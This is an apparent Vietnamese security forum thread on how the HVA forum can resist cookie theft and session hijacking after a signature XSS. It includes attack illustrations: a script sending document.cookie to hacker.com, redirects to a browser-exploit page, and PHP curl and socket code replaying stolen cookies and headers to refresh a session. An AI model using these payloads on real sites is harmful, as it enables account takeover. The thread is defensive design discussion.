Ừm, nói về mặt lý thuyết thì có thể dùng thêm địa chỉ IP để nhận dạng. Còn về tính khả thi của phương pháp này thì không dám lạm bàn vì không rõ overhead cả về memory lẫn cpu sẽ là bao nhiêu. Hơn nữa ở VN hay bị dùng qua proxy của ISP nên nhiều user có chung IP. Tuy nhiên, nếu không có trở ngại về mặt tài nguyên thì chắc là cũng giảm thiểu được kha khá xss. Để xem còn cách nào khác. Thân. 

có 1 biện pháp hơi ...bất khả thi và cũng hơi phức tạp 1 chút thế này, cứ nêu ra anh em tham khảo nhé : dùng thêm 1 biến cookie động, tương tự như cơ chế sinh số sequence ngẫu nhiên. Sequence và step sẽ được browser sử dụng để tính sequence tiếp theo. Mỗi lần người dùng click vào 1 link hay submit .... thì phải gọi đến hàm javascript thay đổi biến cookie kia đã --> điều này quá phức tạp (tuy nhiên nếu dùng body onload() thì không có tác dụng, vì khi đó cookie bị lấy sẽ trở thành hợp lệ). Vậy server có thêm nhiệm vụ là kiểm tra tính hợp lệ của biến cookie này. nhược điểm của phuơng pháp này khá nhiều: - hacker cũng có thể thực thi hàm javascript trước khi lấy cookie. (chỉ có thể làm phức tạp hơn chút việc khai thác thôi) - cookie lưu trong browser không dùng lại được khi người dùng tắt đi và sau 1 thời gian lại kết nối vào diễn đàn. ... Cứ nêu cho mọi người tham khảo xem sao ^^ 

@anh conmale: hình như biến comboHash là anh tính toán hash gì đó dựa vào User-Agent. Nhưng mà User-Agent của victim thì Hacker dễ dàng chôm được mà anh ? Ps: Em nghĩ khó có giải pháp toàn diện để chống XSS phía server-side, vì khi XSS xảy ra thì hacker ko chỉ chôm được Cookie mà còn thể chôm được trọn bộ HTTP Header của victim. :)  

Ta có thể dùng giá trị session được tạo ngẫu nhiên cho mỗi user dạng:Code:

$sessionid = d5(rand().microtime());

Như vậy mỗi người dùng sẽ có một giá trị unique. Sử dụng cùng với lifetime cho mỗi session. 

..... @conmale: giải pháp server thì cũng phải kết hợp với client chứ :D  

Theo tôi thì để ngăn chặn hình thức tấn công này thì phía server tạo một bộ lọc trong phần chữ ký. Tôi nghĩ vấn đề này khá đơn giản. Trước khi hiển thị chữ ký ra ngoài thì tạo một bộ lọc từ database hoặc đơn giản nhất là lúc user nhập dữ liệu vào phần chữ ký ta sẽ có một bộ lọc kiểm tra tại bước này xem chữ ký đó có hợp lệ hay không rồi mới cho phép lưu vào database tôi nghĩ phương pháp này khả thi hơn. Thân. edit: sorry vì chưa đọc kỹ ý của bác commale, bác í nói là ngăn chặn XSS từ phía server tổng quát tôi lại phan ngay cái phần chữ ký :D. Các cách ngăn chặn các bạn trước đã thảo luận rồi, tôi thấy vấn đề tạo tính ngẫu nhiên cho mỗi phiên truy cập là một giải pháp tốt. Nhưng nếu kết hợp với các thông số từ phía người dùng (chẳng hạn như Web browse người đang truy cập là gì, IP ... hay các thông số khác) để kết hợp tạo ra một phiên truy cập sẽ càng tăng tính an toàn hơn. Một lần nữa xin lỗi vì cái tật hồ đồ :D  

Kẻ tấn công không cần biết thuật toán hash là gì, mà chỉ cần sử dụng nguyên xi http header chôm được. Có lẽ đây là vấn đề khá nan giải. Yahoo! Mail hay nhiều trang web khác cũng không có được cơ chế nào chống lại điều này. 

Mấu chốt là ngoài thông tin session ra server phải nhận dạng được clien bằng những thông tin khác, hoặc là cố gắng nhận ra sự truy cập đồng thời từ nhiều máy tính khác nhau qua thái độ duyệt của người dùng. Theo hướng thứ nhất, server có thể ktra thêm một số thông tin có sẵn của client như rhost, IP,...browser, OS, múi h,...; Theo hướng thứ 2: - Cookie but not cookie: Yêu cầu client lưu trữ và trả lời server thông tin về last request (url, timestamp). - Xây dựng cây url (sitemap) để nhận ra những truy cập bất thường gây ra do tình trạng 2 người cùng truy cập. Cách này hơi phức tạp và sẽ gây tác dụng phụ với người dùng. Ngoài ra để hạn chế tác hại, thì những thao tác quan trọng của mod/admin nên bắt confirm bằng pass. À không biết cơ chế xác thực SSL 2 chiều của có tác dụng gì không nhỉ. 

Gần đây diễn đàn HVA bị một lỗi xss trong phần chữ ký của thành viên (được hiển thị trên mỗi bài viết nếu thành viên sử dụng chữ ký). Lỗi này do mod gamma95 tìm thấy và "khai thác" được cookie của những thành viên nào đã tò mò "xem con gián" (chữ ký cũ của gamma95). Cơ chế "khai thác" khá đơn giản, nó dùng xss và gởi giá trị cookie đến một site nào đó. Chủ nhân khai thác (gamma95) có thể xem và sử dụng khi nhận được thông tin này. Tôi không đi sâu vào chi tiết sắp xếp cơ chế "khai thác" này vì nó không phải là trọng tâm của chủ đề. Vấn đề nằm ở chỗ, sau khi lấy được trọn bộ cookie và dùng một công cụ nào đó để "dán" cookie vào để truy cập diễn đàn, người khai thác sẽ có thể đóng vai người bị khai thác (account bị đánh cắp cookie). Đối với các account bình thường thì không có mấy chuyện vui nhưng đối với các account có nhiều chức năng hơn (như của vmods, mods và admins) thì có thể tạo ra dung hại nếu có ý đồ không tốt. Vậy, ngăn chặn xss để ngăn chặn việc đánh cắp cookie là điều hiển nhiên. Tuy nhiên, nếu xss vẫn còn sót ở đâu đó chưa phát hiện được thì tình trạng "dùng cookie" như trên vẫn là mối đe dọa. Bởi thế, cách khắc phục khả thi và hữu hiệu nhất có thể được là gì? Mời các bạn thảo luận. 

Webserver không mắc lỗi XSS và là website mắc lỗi.  

Để ngăn XSS từ phía server thì 1 cách hay nhất là dựa trên địa chỉ IP. Tuy nhiên nó lại gặp hạn chế với hệ thống mạng sử dụng load balancing. => Chịu! Control code website cho tốt thôi, có thể sử dụng 1 trang filter để lọc tất cả các tham số đầu vào cho hệ thống 

Hướng thứ nhất của vivashadow thì đã có bàn ở trên, còn hướng thứ 2, bạn có thể nói rõ thêm về việc "Yêu cầu client lưu trữ và trả lời server thông tin về last request (url, timestamp)" Vì thực chất có lẽ nó cũng không giúp đc gì, vì cái gì thực hiện ở client thì cũng đều có thể bypass được, ngoài ra cơ chế cho việc client làm như vậy là gì?  

Việc confirm thì có lẽ diễn đàn thực hiện khá ok rồi, theo mình biết thì với cookie của mod/admin thì kẻ tấn công có thể sửa, xoá bài, vào đuợc các khu vực chỉ dành cho mod/admin trên diễn đàn, và không thể vào đc cp để thực hiện các chức năng cao hơn (đúng ko nhỉ :-/)  

Lọc đầu vào (từ người dùng) quan trọng hơn chứ :D (trường hợp tổng quát nói chung với các website nhé ^_^) lọc đầu ra có vẻ ít khả thi do khó nhận biết đoạn code nào đã bị inject trong cả 1 trang html. (cũng có thể đc, ví dụ: lọc các thẻ html "có vấn đề" nằm trong <div>[bài viết]</div> của 1 bài viết trên forum chẳng hạn, nhưng đây là trường hợp không tổng quát ...) 

boom_jt wrote:

Lọc đầu vào (từ người dùng) quan trọng hơn chứ :D (trường hợp tổng quát nói chung với các website nhé ^_^) lọc đầu ra có vẻ ít khả thi do khó nhận biết đoạn code nào đã bị inject trong cả 1 trang html. (cũng có thể đc, ví dụ: lọc các thẻ html "có vấn đề" nằm trong <div>[bài viết]</div> của 1 bài viết trên forum chẳng hạn, nhưng đây là trường hợp không tổng quát ...) 

sao lại khó nhỉ? cái nào nhận từ $_GET, $_POST từ người dùng thì trước khi cho nó là "đầu ra" mới lọc thôi, chứ lọc tất cả đầu vào thì hơi thừa rồi nhá :D (tất nhiên là đang nói XSS, chứ SQL ij hay command injection mà làm kiểu này thì tiêu ) 

Webserver không mắc lỗi XSS và là website mắc lỗi. Để ngăn XSS từ phía server thì 1 cách hay nhất là dựa trên địa chỉ IP. Tuy nhiên nó lại gặp hạn chế với hệ thống mạng sử dụng load balancing. => Chịu! Control code website cho tốt thôi, có thể sử dụng 1 trang filter để lọc tất cả các tham số đầu vào cho hệ thống. 

hì hì, bồ cứ đưa đoạn mã bị sql inj, mình đảm bảo fix đc á :P xss như đoạn bồ vừa nói là 1 trường hợp rất hay, (cũng filter đc chớ :P giả dụ ko cho thực hiện câu javascript tiếp theo bằng dấu ; - js mà ko có ; thì có thực hiện tiếp đc ko nhỉ :-/) @mR.Bi: lọc hết js thì mất hết hay của web rùi còn gì :D 

Đối với XSS thì lọc đầu vào quan trọng hay lọc đầu ra quan trọng nhỉ ? :D  

gamma95 wrote:

Đối với XSS thì lọc đầu vào quan trọng hay lọc đầu ra quan trọng nhỉ ? :D  

Lão gamma95 luôn đặt ra những câu hỏi thông minh, ý nhị và đượm chút láu lỉnh. Vậy thì giống như ta vào một cửa hàng mua đồ, nhưng cửa hàng nhiều bụi. Nên chủ cửa hàng thiết kế một hệ thống hút bụi đặt ngoài cửa và hệ thống này sẽ có nhiệm vụ hút hết bụi bậm trên quần áo khách hàng lúc ra khỏi cửa hàng?. Hì hì. Nhưng xin hỏi lại gamma95 một câu để đựoc chỉ giáo, là: Trong quá trình nạn nhân (thành phần thứ 2) "chủ động" kết nối đến một Webserver độc hại, có "cơ cấu" chôm HTTP header+cookie, (bằng cách vô tình click chuột vào một link nào đấy trên HVA forum), hay "bị động" bị dẫn đến đó, thì cái "khối" HTTP header+cookie của nạn nhân vừa truy cập vào HVA ấy, nó "nằm" (located) ở đâu? Trên HVA forum hay trên máy của nạn nhân? trứoc khi nó bị chuyển về Webserver độc hại. Thanks for your reply! 

cookie thì nằm trên máy nạn nhân, còn bản thân cái khối HTTP Header của HVA thì ko lấy được vì bản thân khi cookie bay vế host của Attacker + kèm theo HTTP header truy cập đến host Attacker mà thôi ( tuy nhiên trong HTTP Header này chứa một số thông tin quan trọng như User-Agent, Referer (từ HVA) ...) Chừng đó thông tin cũng đủ để Attacker giả mạo HTTP Header hợp lệ đến HVA để bypass qua một số bước check ( như comboHash chẳng hạn). ko biết cháu trả lời thế đúng ý bác PMX ko? Còn về giải pháp HttpOnly cũng ko phải là một giải pháp[color=yellow] ko toàn diện[/color], vì trong một số trường hợp cụ thể, nó vẫn có thể bị bypass :D  

Chào bác PXM cookie thì nằm trên máy nạn nhân, còn bản thân cái khối HTTP Header của HVA thì ko lấy được vì bản thân khi cookie bay vế host của Attacker + kèm theo HTTP header truy cập đến host Attacker mà thôi ( tuy nhiên trong HTTP Header này chứa một số thông tin quan trọng như User-Agent, Referer (từ HVA) ...) Chừng đó thông tin cũng đủ để Attacker giả mạo HTTP Header hợp lệ đến HVA để bypass qua một số bước check ( như comboHash chẳng hạn). ko biết cháu trả lời thế đúng ý bác PMX ko? Còn về giải pháp HttpOnly cũng ko phải là một giải pháp toàn diện, vì trong một số trường hợp cụ thể, nó vẫn có thể bị bypass :D  

1- Hạn chế quyền của VMod và Mod, đặc biệt trong việc "xóa" bài. Thí dụ chỉ cho phép Vmod hay Mod xóa nhiều nhất là 5 post trong một phiên kết nối và hoàn toàn không có quyền xóa toàn bộ một topic, cũng như chỉ cho phép "ban" hay "warning" tối đa 1 nick trong một phiên kết nối. (Thưc ra quyền hạn của Mod hay VMod trong HVA vốn cũng đã hạn chê).  

2- Khi chỉ xem forum, post bài, các Admin. không nên truy cập vào HVA forum dứoi nickname- password của một Administrator, với quyền hạn như của một "root", mà chỉ nên truy cập vào dưới nickname và password với quyền hạn như của một Mod. Còn khi config. lại Forum mới dùng quyền của Admin-root.  

1- Áp dụng suy luận "ngoại phạm" hay "nôi phạm" gì đó của bên công an điều tra. Nghĩa là về nguyên tắc một user, tại một thời điểm xác định (theo Date và Time của Server) thì không thể cùng có mặt tại hai URL khác nhau. Ở đây có thể cải tiến tiện ích hiện hữu vốn rất hay của HVA forum là "ai đang làm gì, ở đâu" để phát hiện ra hacker.  

2- Cải tiến một tiện ích Monitoring user hay đựoc cài trên các Website, từ đó phát hiện ra một nickname nào đó lại dùng các OS, trình duyệt... khác nhau trong cùng một phiên kết nối. Từ đó phát hiện khả năng nickname này đang bị chiếm đoạt.  

Sự cố 'con gián' do mod gamma95 tìm ra ko liên quan gì đến link động. 

lQ wrote:

Theo ngu ý của tôi thì admin nên deny tất cả những link động trên web app mà Users có thể tạo ra.  

Sự cố 'con gián' do mod gamma95 tìm ra ko liên quan gì đến link động. 

Oh, theo tôi nghĩ là có chứ nhỉ. Cái link động được che đậy sau cái ảnh trong một thẻ script. 

<script>
var a='http://';
var b='www.';
var c='hacker';
var d='.net';
window.location=a+b+c+d;
</script>

hí hí, chủ đề hay ghê, có lẽ phải đổi tên chút cho anh em bàn luận thoải mái về xss, chứ không chỉ ngăn chặn session hijacking á. Mà xem chừng có vẻ chưa có đc giải pháp nào triệt để với với vấn đề này rồi :( 

hí hí, chủ đề hay ghê, có lẽ phải đổi tên chút cho anh em bàn luận thoải mái về xss, chứ không chỉ ngăn chặn session hijacking á. Mà xem chừng có vẻ chưa có đc giải pháp nào triệt để với với vấn đề này rồi :( 

Đối với XSS thì lọc đầu vào quan trọng hay lọc đầu ra quan trọng nhỉ ? 

@gamma95: oki you re right! Hồi trước mình làm bộ lọc là lọc chung cho SQL và XSS. Lúc đó cũng đã nhận ra một số bất cập trong việc xử lý XSS như gama đã nói. @PMMM jj đó: Theo bồ không check đầu vào, đầu ra thì liệu có khắc phục triệt để XSS? Cookie, HTTP header của bồ đều có thể giả mạo. 

Có vẻ như HTTP authentication cũng ko thể chống đc XSS ... 

@bác PXM: cháu ví dụ: HVA bị XSS và hacker chèn đoạn này vào chữ ký: <script> window.location="http://hacker.com/cookie.php?cookie="+document.cookie;</script>thì bản thân function "document.cookie" có chức năng đọc cookie của HVA, sau đó giá trị của cookie đóng vai trò là một @argument và gửi đến script đọc giá trị @argument đó và ghi vào file log.txt của hacker thôi. Còn câu hỏi của bác PMX là có chịu tổn thương gì ko thì theo cháu muốn trả lời được thì phải xem XSS ngoài chuyện lấy cookie ra thì có thể làm đc những gì? Ví dụ như Phishing, pharming, cài mã độc, hay dùng những 0-day exploit của browser etc ?? 

boom_jt wrote:

Có vẻ như HTTP authentication cũng ko thể chống đc XSS ... 

Ok, nhờ bạn boom_it phân tích thêm về nhận định này :D  

A Short Demonstration Video: http://ferruh.mavituna.com/blogs/xsstunnelling-video.zip Video shows to exploit a permanent XSS in wordpress and bypass Basic Auth on the fly by XSS Tunnel. 

Khi đọc các file độc hại trên webserver có lỗi XSS (thí dụ HVAforum) trình duyệt có thể bị tổn thương 

<script> window.location="http://hacker.com/khaithacloitrinhduyet.htm"</script> 

.... Về vấn đề khai thác xss tại thời điểm này, thì theo như bác gamma có nhận thấy sự xuất hiện của 1 biến combohash trong cookie do bác conmale đưa thêm vào, như vậy với cách khai thác là chỉ thay cookie thì chưa chắc đã thành công. File cookie.php của bác gamma sẽ phải có thêm chức năng lưu lại http header từ browser của victim gửi kèm, từ đó sử dụng http header này cùng với cookie thu được thì may ra sẽ thành công chăng :D 

...đồng thời set một cookie "đặc biệt"...  

Cứ như thế, mỗi request từ user A phải kèm theo một cookie mới nhất và có giá trị được HVA set ở lần request gần nhất trước đây và request ấy chỉ được trả lời nếu như nó có cookie mới nhất và có giá trị.  

Khơi thêm một tí để bàn cho vui :P Giả sử chúng ta có một trường hợp xử lý như sau: 1) User A gởi request thứ nhất đến HVA và chưa hề nhận được một cookie nào cả. 2) HVA trả lời request thứ nhất này đồng thời set một cookie "đặc biệt" trên trình duyệt của user A. Tạm gọi cookie này là cookie=1 3) User A gởi request thứ nhì đến HVA, request này có kèm theo cookie=1. Ở bước này HVA sẽ tiếp nhận request thứ nhì của user A nếu như nó có kèm theo cookie=1. Nếu không, nó sẽ từ chối trả lời. Nếu HVA tiếp nhận request thứ nhì này (vì nó có kèm theo cookie=1), HVA sẽ tiếp tục set một cookie khác đến trình duyệt của user A. Tạm gọi là cookie=2 (cookie=1 đã bị hủy). Cứ như thế, mỗi request từ user A phải kèm theo một cookie mới nhất và có giá trị được HVA set ở lần request gần nhất trước đây và request ấy chỉ được trả lời nếu như nó có cookie mới nhất và có giá trị. Với cơ chế như trên, giả sử user B bằng cách nào đó "chôm" được cookie của user A (cứ cho rằng user B chôm được trọn bộ HTTP header của user A). Liệu user B có thể làm được gì với cookie lấy được? Tại sao? Tại sao không? Mời bà con bàn. Thân. 

conmale wrote:

Khơi thêm một tí để bàn cho vui :P Giả sử chúng ta có một trường hợp xử lý như sau: 1) User A gởi request thứ nhất đến HVA và chưa hề nhận được một cookie nào cả. 2) HVA trả lời request thứ nhất này đồng thời set một cookie "đặc biệt" trên trình duyệt của user A. Tạm gọi cookie này là cookie=1 3) User A gởi request thứ nhì đến HVA, request này có kèm theo cookie=1. Ở bước này HVA sẽ tiếp nhận request thứ nhì của user A nếu như nó có kèm theo cookie=1. Nếu không, nó sẽ từ chối trả lời. Nếu HVA tiếp nhận request thứ nhì này (vì nó có kèm theo cookie=1), HVA sẽ tiếp tục set một cookie khác đến trình duyệt của user A. Tạm gọi là cookie=2 (cookie=1 đã bị hủy). Cứ như thế, mỗi request từ user A phải kèm theo một cookie mới nhất và có giá trị được HVA set ở lần request gần nhất trước đây và request ấy chỉ được trả lời nếu như nó có cookie mới nhất và có giá trị. Với cơ chế như trên, giả sử user B bằng cách nào đó "chôm" được cookie của user A (cứ cho rằng user B chôm được trọn bộ HTTP header của user A). Liệu user B có thể làm được gì với cookie lấy được? Tại sao? Tại sao không? Mời bà con bàn. Thân. 

Theo em thằng Thằng User B nó vẫn exploit bình thường vì nó đã tóm được cookie thứ N ( là mới nhất) sau đó nó nhanh tay thực hiện một cú request khác đến HVA để lấy cái Cookie thứ N+1. Tại sao phải nhanh tay, vì nếu không nhanh tay thì thằng Victim A sau khi bị mất Cookie thứ N nó duyệt một link khác trên HVA thì Cookie thứ N của thằng Hacker B trở nên vô giá trị :D. Đây cũng là một trong những phương pháp tốt để chống kiểu tấn công "Session fixation" 

@secmask: tui có nói đến cụm từ "nhanh tay" :D, còn chuyện một đoạn javascript để connect đến HVA trong khoảng thời gian delay nào đó ... thì attacker có thể disable đoạn script đó cũng bằng "XSS exploit ". Cụ thể là một đoạn javascript set lại thời gian delay phía victim ( hoặc Disable luôn) sau đó mới chôm cookie bình thường :D 

@boom_it: đồng chí nói rõ cái công nghệ "tự động gởi tới webserver" đc ko? :D 

Cách của bác conmale có thể bypass 1 cách đơn giản thế này (không cần phải nhanh tay ha :D) : khi server của người tấn công nhận đc cookie mới nhất của victim, nó tự động liền sau đó gửi yêu cầu tới web server với http header và cookie của victim để lấy về cookie "mới hơn nữa" :D như vậy kẻ tấn công sẽ chiếm đc 1 cookie hợp lệ, đồng thời biến cookie đang lưu trong browser nạn nhân trở thành bất hợp lệ. Và thông thường boom_jt thấy thì nạn nhân có login lại thì cookie của kẻ tấn công cũng không trở thành bất hợp lệ do sự cho phép nhiều người dùng đăng nhập vào cùng 1 tài khoản.  

Vậy làm sao để hạn chế việc này? 1. Chỉ cho phép 1 người dùng đăng nhập vào 1 tài khoản trong 1 thời điểm, và cookie đc set khi đăng nhập thành công sẽ là cookie hợp lệ. tất nhiên điều này kéo theo 1 vài ràng buộc nào đó liên quan đến yêu cầu phần mềm, nói chung là cũng còn tùy trường hợp. Trong trường hợp HVA forum thì có lẽ cơ chế này có thể áp dụng  

2. Dựa trên cách bác conmale đề ra: sử dụng 1 cookie SID không đổi (session) và cookie động (giống như của bác conmale). Chỉ cần cookie động không hợp lệ là SID sẽ bị loại bỏ luôn. Như thế, khi nạn nhân sử dụng cookie "không còn hợp lệ" (do cách khai thác ở trên) để tạo kết nối tiếp theo cũng đồng nghĩa với việc biến cookie "hợp lệ" đang nằm trong tay kẻ tấn công thành bất hợp lệ. Nạn nhân sẽ phải đăng nhập lại để có cookie hợp lệ.  

Tuy nhiên, với cách 2 như vừa nêu, giả sử lỗi XSS nằm ngay tại index của diễn đàn (hay trong danh sách thành viên online chẳng hạn), sẽ dẫn đến 1 vấn đề là toàn bộ thành viên sẽ ko thể vào đc diễn đàn, vì cookie của họ liên tục trở thành bất hợp lệ! Phương pháp nào cũng có mặt trái của nó :( kèm theo đó là 1 số bất cập do các bác đã nêu... thân mến 

gamma95 wrote:

@secmask: tui có nói đến cụm từ "nhanh tay" :D, còn chuyện một đoạn javascript để connect đến HVA trong khoảng thời gian delay nào đó ... thì attacker có thể disable đoạn script đó cũng bằng "XSS exploit ". Cụ thể là một đoạn javascript set lại thời gian delay phía victim ( hoặc Disable luôn) sau đó mới chôm cookie bình thường :D 

Hiện tại HVA có dùng 1 iframe ở cuối để ping về HVA sau interval 600s, có thể kết hợp cái này để làm mới cookie mà không cần đoạn javascrip secmask nói. 

<script>window.open() .....</script><!-- 

Cách của bác conmale có thể bypass 1 cách đơn giản thế này (không cần phải nhanh tay ha ) : khi server của người tấn công nhận đc cookie mới nhất của victim, nó tự động liền sau đó gửi yêu cầu tới web server với http header và cookie của victim để lấy về cookie "mới hơn nữa" như vậy kẻ tấn công sẽ chiếm đc 1 cookie hợp lệ, đồng thời biến cookie đang lưu trong browser nạn nhân trở thành bất hợp lệ. Và thông thường boom_jt thấy thì nạn nhân có login lại thì cookie của kẻ tấn công cũng không trở thành bất hợp lệ do sự cho phép nhiều người dùng đăng nhập vào cùng 1 tài khoản. 

Nếu không nhanh tay thì làm sao có thể tiếp tục dùng cookie chôm được để gởi request đến HVA server để lấy cookie mới? Nếu kẻ tấn công cần thời gian để setup và để có thể dùng cookie chôm được, lúc ấy có thể cookie mới đã được cấp đến victim rồi và cookie chôm được trở thành vô dụng. Cái quan trọng là động tác "tự động liền sau đó gửi yêu cầu tới web server với http header và cookie của victim để lấy về cookie" thực hiện như thế nào. 

Nên nhớ rằng, các phương pháp xss hiện giờ chưa có cách nào khả dĩ để có thể "tự động gởi yêu cầu đến server bằng cookie chôm được" với thời gian đủ nhanh. 

...
$user_agent = $_SERVER['HTTP_USER_AGENT'];
... // lưu các giá trị nhận đc vào các biến 

$ch = curl_init('/hvaonline/recentTopics/list.html');
curl_setopt($ch, CURLOPT_USERAGENT, $user_agent);
... // set đầy đủ các thuộc tính thu đc từ http header
curl_setopt($ch, CURLOPT_COOKIE, $cookie);
$res = curl_exec($ch); //thực hiện kết nối tới HVA bằng cookie vừa nhận đc
curl_close($ch);

SaveCookie($res)  //thực hiện việc lưu cookie mới nhận đc trong kết quả trả về

http://host/conmale_gamma95.php

Nếu như session của kẻ tấn công có yếu tố nào đó giúp phân biệt được và chính session (của người thực hiện hijack) ấy bị hủy chớ không phải session của người bị hijack bị hủy thì sao? 

:

conmale wrote:

Nếu như session của kẻ tấn công có yếu tố nào đó giúp phân biệt được và chính session (của người thực hiện hijack) ấy bị hủy chớ không phải session của người bị hijack bị hủy thì sao? 

hiện tại boom_jt chưa nghĩ ra, mong bác conmale chỉ giáo :) 

boom_jt wrote:

:

conmale wrote:

Nếu như session của kẻ tấn công có yếu tố nào đó giúp phân biệt được và chính session (của người thực hiện hijack) ấy bị hủy chớ không phải session của người bị hijack bị hủy thì sao? 

hiện tại boom_jt chưa nghĩ ra, mong bác conmale chỉ giáo :) 

Cái chỗ này chính xác là vấn đề mọi người đáng quan tâm :) , Bạn nên nghĩ tới các yếu tố kết hợp nào để tạo ra một session như thế nhằm để phân biệt được ai là kẻ đang giả mạo phiên truy cập :D, Vd nhé : người dùng hợp lệ đang duyện HVA bằng IE, còn kẻ tấn công thì dùng firefox ... đó là những yếu tố cần kết hợp để tạo ra một sessioniD có thể phân biệt. Không biết đúng không ta ? :D 

@boom_it: đoạn mã cậu post lên tui chưa thấy tính tự động ở đâu cả. Cái tự động ở đây theo ý tui là ngay khi cái file log.txt nhận được cookie được gởi đến bởi nạn nhân thì ngay lập tức nó lấy giá trị cookie + HTTP header đó generate ra một http request đến server HVA ngay lập tức để lấy cookie mới kìa :) 

<?php
function getURL(){
	error_reporting(E_ALL);
	$filenameurl = "urlip.txt"; //the default blog file
	$sReponse="heheheheh";
	//echo "<h2>TCP/IP Connection</h2>\n";

	/* Get the port for the WWW service. */
	$service_port = getservbyname('www', 'tcp');

	/* Get the IP address for the target host. */
	
	$address = gethostbyname('www.hvaonline.net/......');  //gì gì đó :D

	/* Create a TCP/IP socket. */
	$socket = socket_create(AF_INET, SOCK_STREAM, SOL_TCP);
	if ($socket === false) {
		//echo "socket_create() failed: reason: " . socket_strerror(socket_last_error()) . "\n";
	} else {
		//echo "OK.\n";
	}

	//echo "Attempting to connect to '$address' on port '$service_port'...";
	$result = socket_connect($socket, $address, $service_port);
	if ($result === false) {
		//echo "socket_connect() failed.\nReason: ($result) " . socket_strerror(socket_last_error($socket)) . "\n";
	} else {
		//echo "OK.\n";
	}

	$in = "GET /hvaonline/posts/reply/0/15621.html HTTP/1.1\r\n";  /// ... gì gì đó :D
	$in .= "Host:www.hvaonline.net\r\n";
       //chỗ này chèn thông tin thu thập gì gì đó
       //..
      //..

        $in .= "Connection: Close\r\n\r\n";
	$out = '';


	//echo "Sending HTTP HEAD request...";
	socket_write($socket, $in, strlen($in));
	//echo "OK.\n";

	//echo "Reading response:\n\n";
	while ($out = socket_read($socket, 2048)) {
		//echo $out;
		$sReponse .=  $out;
	}

	//echo "Closing socket...";
	socket_close($socket);
	//echo "OK.\n\n";

	if (file_exists("$filenameurl")) {
			$fp = fopen($filenameurl,"a+");
			fputs($fp,"==========\n".$sReponse."\n==========\n");
			fclose($fp); 
	}
}

@boom_it: đoạn mã cậu post lên tui chưa thấy tính tự động ở đâu cả. Cái tự động ở đây theo ý tui là ngay khi cái file log.txt nhận được cookie được gởi đến bởi nạn nhân thì ngay lập tức nó lấy giá trị cookie + HTTP header đó generate ra một http request đến server HVA ngay lập tức để lấy cookie mới kìa :) 

2. Dựa trên cách bác conmale đề ra: sử dụng 1 cookie SID không đổi (session) và cookie động (giống như của bác conmale). Chỉ cần cookie động không hợp lệ là SID sẽ bị loại bỏ luôn. Như thế, khi nạn nhân sử dụng cookie "không còn hợp lệ" (do cách khai thác ở trên) để tạo kết nối tiếp theo cũng đồng nghĩa với việc biến cookie "hợp lệ" đang nằm trong tay kẻ tấn công thành bất hợp lệ. Nạn nhân sẽ phải đăng nhập lại để có cookie hợp lệ.  

Tuy nhiên, với cách 2 như vừa nêu, giả sử lỗi XSS nằm ngay tại index của diễn đàn (hay trong danh sách thành viên online chẳng hạn), sẽ dẫn đến 1 vấn đề là toàn bộ thành viên sẽ ko thể vào đc diễn đàn, vì cookie của họ liên tục trở thành bất hợp lệ!  

@vivashadow: Attacker dễ dàng inject cái script này để disable nguyên đoạn mã html phía dưới, trong đó có cả cái iframe chứa ping.jsp của HVA

<script>window.open() .....</script><!--  

 

Khi có 1 request khác tới , nó sẽ xác nhập thông tin về IP của client , nếu có 1 sự thay đổi IP , server sẽ yêu cầu client đăng nhập lại ?... 

"Con gián" của gamma hại nhỉ? ;) Anyway, tôi cho rằng, mọi hành động điều chỉnh cookie, như cách anh conmale đề cập, chỉ là những "mánh mung", hòng gây thêm khó khăn cho kẻ tấn công, chứ không phải là một giải pháp triệt để.  

Hơi off-topic, tôi nghĩ có lẽ chúng ta đang xác định sai vấn đề cần giải quyết, nên các giải pháp đưa ra đều khó lòng mà triệt để. Vấn đề mà chúng ta cần giải quyết ở đây không phải là xác thực người dùng (user authentication, như mọi người vẫn đang cố gắng triển khai, thông qua các hình thức cookie, username, password, token...), mà phải là xác thực từng hành động mà người dùng thực thi trên hệ thống (transaction authentication).  

Tôi đưa ra một ví dụ về sự thất bại của chiến thuật xác thuật người dùng. Ngay ở HVAOnline, trước đây, JForum bị dính một lỗi CSRF (có một topic về đề tài này trên HVAOnline), anh conmale mới triển khai một kiểu securityHash, là một hidden field trong mấy cái form trên HVAOnline. securityHash giải quyết được CSRF cho đến khi gamma, với sự cố "con gián" :-d, đã chôm được luôn cookie (và thật ra khi đã bị XSS rồi, thì securityHash kô còn có tác dụng nữa) và từ đó chiếm luôn session của những người nào mải mê "bắt gián". Rõ ràng, các phương thức xác thực như cookie, session hay securityHash không phải là giải phát triệt để để bảo đảm an ninh cho phía server, ngăn ngừa những tổn hại có thể xảy ra với server trong trường hợp credential của user bị đánh cắp. Đó là tôi chưa kể đến những vấn đề như MITM trojan có khả năng chôm credential của user một cách tự động và "trong suốt" luôn. Tóm lại, từ máy tính của người dùng đến server, có quá nhiều cạm bẫy và rủi ro có thể khiến người dùng bị chôm mất credential của mình.  

Do đó, tôi nghĩ bây giờ phải assump là, người dùng sẽ bị chôm credential, trong trường hợp này là attacker có thể tạo ra một request hoàn toàn bình thường như người dùng. Câu hỏi là có cách nào kiểm tra request đó ở phía server hay không? Có nhiều cách, tùy theo từng hoàn cảnh, chẳng hạn như: - đối với các hệ thống tài chính, ngân hàng, họ đều triển khai một hệ thống gọi là "fraud detection system", tạm dịch là hệ thống phát hiện gian lận. Hệ thống này được xây dựng dựa trên nền tảng của AI, có khả năng tìm hiểu, phân tích, học và adapt theo thói quen của người dùng. Ví dụ như họ phân tích thói quen tiêu tiền của tôi là lần nào cũng rút tiền từ ATM ra cao lắm là 2 triệu, tại một trong 2 máy ATM gần chỗ làm. Nếu một ngày nào đó, tự nhiên ai đó rút ra hết tiền của tôi, tại một máy ATM ở...Lạng Sơn chẳng hạn, hệ thống sẽ báo động và ngừng giao dịch đó lại.  

Đương nhiên xây dựng một hệ thống như thế đòi hỏi tiền bạc, thời gian, nhân lực và rõ ràng là không thể áp dụng cho HVAOnline. - đối với một hệ thống như HVAOnline, chúng ta có thể điều chỉnh bằng các rule, chẳng hạn như: + ủy thác thực hiện các chức năng quan trọng vào một lớp IP nhất định. + trước khi thực hiện bất kỳ chức năng nào, phải verify lại mật khẩu. + tách bạch giữa account quản lý và account sinh hoạt trên diễn đàn (chẳng hạn như "quanlytruong") + ...  

Sorry mọi người, hơi bị off-topic ;). -m  

Hì hì, mục đích đằng sau là để tìm hiểu những giới hạn của giao thức HTTP hiện nay trong phạm vi session management đó em . Cái này quan trọng và lý thú hơn chỉ dừng lại ở mức "quick fix". 

